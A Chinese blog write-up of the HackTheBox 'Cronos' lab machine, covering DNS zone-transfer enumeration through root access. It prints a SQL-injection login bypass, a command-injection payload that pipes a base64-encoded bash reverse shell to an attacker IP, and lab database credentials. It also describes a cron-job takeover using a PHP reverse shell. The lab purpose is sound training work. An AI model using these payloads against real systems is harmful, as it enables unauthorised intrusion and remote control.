HackTheBox | Cronos

已于 2023-04-11 08:30:58 修改
阅读量182 收藏
点赞数
分类专栏: htb记录 文章标签: php 网络安全
于 2023-03-17 11:39:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpose_7/article/details/129616479
版权

nmap扫描,开启22、80、53,其中80对应apache默认web服务

image-20230317102848206

尝试对DNS服务进行攻击

dig查询,没有信息。dig axfr可以用于检测区域传送漏洞。

image-20230317103402142

image-20230317103557599

使用nslookup查询,得到一个域名ns1.cronos.htb

image-20230317103701119

基于获取到的域名,再次进行dig查询,得到域名admin.cronos.htb

image-20230317103836360

修改本地hosts文件,访问http://admin.cronos.htb,得到一个web页面

image-20230317103950233

通过万能密码成功登录到后台;UserName:admin' or 1=1#

image-20230317104054031

后台看起来很象命令执行的利用,尝试之后确实如此。payload:8.8.8.8;ls

image-20230317104149619

直接反弹shell;payload:8.8.8.8;echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zLzEyMzQgMD4mMSc=|base64 -d|bash -i

image-20230317104354352

信息收集,看到普通用户noulis

image-20230317104424448

在web服务的路径下发现config.php,得到数据库连接方式admin/kEjdbRigfBHUREiNSDs;尝试使用该密码直接登录noulis的ssh,但是失败。

image-20230317104516028

既然给了数据库密码,那么就看一下数据库,果然存在,但是仅对127.0.0.1开启监听。

image-20230317104833514

为了方便,直接查询;得到密码4f5fffa7b2340178a716e3832451e058,看起来是MD5值。

mysql -uadmin -pkEjdbRigfBHUREiNSDs -e "show databases;"
mysql -uadmin -pkEjdbRigfBHUREiNSDs -e "use admin;show tables;"
mysql -uadmin -pkEjdbRigfBHUREiNSDs -e "use admin;show tables;select * from admin.users;"

image-20230317104847618

MD5解密,得到明文:1327663704;但是这个密码也无法登录noulis用户。

image-20230317105117558

只好上传linenum进行信息收集,只发现noulis有特殊权限。

image-20230317105756114

继续收集信息,找到另一个web目录laravel

image-20230317110336234

在apache2的配置文件中找到另一个域名www.cronos.htb

image-20230317110523437

访问后得到如下页面,但是分析之后,laravel同样也是运行在www-data权限下的,所以就算RCE也同样拿到的www-data权限。

image-20230317110552905

回过头看,发现定时任务中存在特殊内容,且以root权限运行。涉及到文件/var/www/laravel/artisan

image-20230317112736112

该文件是www-data可以控制的,所以可以直接替换文件为php反弹shell脚本,等待定时任务触发执行。

image-20230317113406131

xxL7-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
HackTheBox - Cronos Write Up
ak.Gh0st的博客
04-03 222
HackTheBox - Cronos Write Up
HackTheBox靶场系列(一)之HackTheBox靶场简介
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-30 3347
Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中有许多模拟真实场景的机器。HackTheBox靶场是一个虚拟的渗透测试训练平台,用于帮助安全研究人员、渗透测试人员和学生提高他们的技能。它包含一系列的虚拟机,其中每一个虚拟机都代表一个可攻击的目标系统。通过攻击这些虚拟机和解决它们的漏洞,用户可以提高自己的技能和知识,以更好地了解实际环境中的攻击和防御。
Hack The Box,一款有意思的渗透测试平台
m0_60571990的博客
11-28 6524
Hack The Box,一款有意思的渗透测试平台
Hack The Box真实靶机环境搭建教程
大河之犬的博客
05-23 1983
应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。然后就可以下载VPN配置文件了。接下来,这里有欧洲和美国两个地区,每个地区只有一个服务节点,选择自己的VPN对应的节点。
Cronos:功能齐全的.NET库,用于处理Cron表达式。 牢记时区,直观地处理夏时制转换
02-05
Cronos是一个.NET库,用于解析Cron表达式并计算下一次出现。 它是设计时考虑时区,并直观地处理(又名夏令时)转换为* nix中的Cron。 请注意,该库不包含任何任务/作业计划程序,仅适用于Cron表达式。 支持带有可...
Management-CRONOS:CRONOS的模块
05-05
CRONOS是一款强大的任务调度和管理系统,其设计目标是帮助用户自动化执行一系列定时任务,比如数据备份、系统维护、报告生成等。在这个“Management-CRONOS: CRONOS的模块”主题中,我们将深入探讨CRONOS的核心组件...
Cronos II-开源
05-01
**Cronos II 开源邮件客户端详解** Cronos II 是一个基于 C 语言开发的邮件用户代理(MUA),专为 GNOME 图形环境设计。作为一个开源项目,它提供了源代码,鼓励用户自由查看、修改和分发,体现了开源软件的核心...
Python库 | cron-converter-0.4.2.tar.gz
03-02
**Python库cron-converter-0.4.2详解** 在IT行业中,Python作为一种高级编程语言,因其简洁明了的语法和强大的库支持而备受青睐。本文将深入探讨名为`cron-converter-0.4.2`的Python库,它是一个用于处理Unix定时...
Hack The Box靶场使用流程及方法
z875611510的博客
06-09 4085
协议有两个:UDP1337、TCP443,应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。国内视频介绍(kali连接htb):https://www.bilibili.com/video/BV1Q94y1f73u。以上就是hackthebox靶场的使用和第一关详解,总的来说这个靶场还是基础的,里面的资源也比较丰富,适合安全初学者入门。登录我们的HTB账号,点击右上角的“CONNECT TO HTB”,上面有两个选项,这里选择入门的就行。
《Hack The Box 玩转指南:初学者到高手的渗透测试之旅》
最新发布
2201_75353421的博客
01-30 1771
《Hack The Box 实战指南:从注册到成功通关的渗透测试之旅》介绍了在Hack The Box平台上进行渗透测试的全过程。从注册开始,通过连接实验室、生成自己的服务器,一直到成功通关的每一步都得到详细解说。这是一篇适合初学者的实用指南,旨在帮助读者提高渗透测试技能和实际操作经验。
入坑 Hack The Box
LainWith的博客
10-19 1万+
视频介绍:https://www.bilibili.com/video/BV17T4y1i7Uh 官方文档:https://help.hackthebox.com/en/articles/5185158-introduction-to-hack-the-box个人感觉前者偏向实战一些,后者偏向练习题一些。更详细的区别,参见: https://hacktalk.net/hacking-the-box-htb-vs-vulnhub/过去注册HTB的时候,需要拿到邀请码才行,类似下面视频这种,但是现在你不需要邀请
【Hack The Box】windows练习-- Blackfield
人间体佐菲的博客
11-17 419
【Hack The Box】windows练习-- Blackfield
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
第一章 网络安全从实战入门 hack the box
qq_42676415的博客
04-24 632
这会下载一个后缀为ovpn的文件,这个文件就是链接hack the box 的网络文件。(3)输入openvpn (路径)文件名,然后回车开始链接hack the box 的网络。二、我们使用kali系统,这个可以安装虚拟机,网络上教程一大堆,不在手把手教。(不会安装,不知道如何在官网下载的可以私信我)(2)输入sudo -I 命令切换为超级管理员用户。我们利用hack the box 进行教学,官方网址。在终端显示如下后,刷新网页如下右边就是链接成功。三、链接hack the box 的网络。
HackTheBox配置详解
2301_78325931的博客
06-02 388
2023HackTheBox配置一次过
HackTheBox 如何使用
网络安全学习
04-14 4633
如何开始? 1.到官网注册一个账号 https://www.hackthebox.com/ 2.验证自己的邮箱 3.下载 openvpn 4.到左边的 labs 实验室开始学习或直接点击 start point 5.点击想要完成的靶机,比如第 0 层的第一个靶机,选择 connnect to htb 选择 openvpn 会自动下载 openvpn 的文件,然后用 openvpn 导入,稍等一下即可连接 在 kali(linux)中如何连接? 同样是执行下载的文件 ┌──(root💀kali)-[~/d
生命在于折腾——HackTheBox入门
易水哲的博客
01-12 1502
HackTheBox入门教程
Scheduled cron
08-05
3. In the crontab file, you can define your cron job using the cron syntax. The syntax consists of five fields: minute, hour, day of month, month, and day of week. For example, if you want to ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值